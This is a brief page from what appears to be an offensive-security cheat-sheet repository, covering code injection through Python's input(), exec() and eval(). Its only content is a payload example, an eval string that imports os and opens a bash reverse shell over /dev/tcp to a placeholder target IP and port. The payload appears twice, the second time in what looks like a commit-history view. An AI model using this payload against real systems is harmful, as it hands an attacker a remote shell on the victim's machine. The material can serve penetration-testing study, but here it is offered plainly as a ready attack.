killchain-compendium/Exploits/Python/Code Injection.md

# Code Injection

* Python's `input()`, `exec()` and `eval()` makes it possible

## Usage

* Payload example
```python
eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# Code Injection`

			* Python's `input()`, `exec()` and `eval()` makes it possible

			`## Usage`

			`* Payload example`
			```python
			`eval("__import__('os').system('bash -i >& /dev/tcp/$TARGET_IP/$TARGET_PORT 0>&1')#")`
			```